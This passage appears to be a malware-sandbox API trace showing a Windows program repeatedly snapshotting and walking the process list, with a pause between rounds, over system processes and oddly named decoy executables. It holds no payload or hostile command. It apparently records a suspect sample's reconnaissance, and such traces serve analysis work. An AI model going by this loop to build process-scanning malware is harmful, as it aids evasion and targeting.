cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0109.691] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.692] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.695] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0109.696] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0109.697] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0109.698] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0109.699] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0109.700] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0109.702] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0109.703] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0109.704] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0109.705] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0109.706] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0109.707] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0109.709] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0109.710] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0109.711] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0109.712] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0109.713] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0109.714] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0109.715] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0109.716] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0109.717] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.718] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0109.719] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0109.720] CloseHandle (hObject=0xbc) returned 1 [0109.720] Sleep (dwMilliseconds=0x12c) [0110.020] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0110.026] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.027] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0110.027] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0110.028] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.029] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0110.029] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.030] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0110.031] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0110.031] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, 
th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0110.032] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0110.032] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.033] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.034] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.034] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.035] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.036] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, 
th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0110.036] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.037] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.038] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0110.039] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.040] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.041] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0110.042] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, 
th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0110.043] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0110.045] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.046] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.047] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0110.048] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0110.049] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0110.050] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, 
th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0110.052] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0110.053] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0110.054] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0110.055] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0110.056] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0110.057] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0110.058] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0110.059] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0110.060] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0110.062] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0110.063] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0110.064] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0110.065] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0110.066] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0110.082] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0110.084] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0110.085] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.086] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0110.087] CloseHandle (hObject=0xc4) returned 1 [0110.087] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0110.092] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.092] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="System")) returned 1 [0110.093] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0110.094] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.095] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0110.096] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.097] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0110.097] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0110.099] Process32NextW (in: hSnapshot=0xbc, 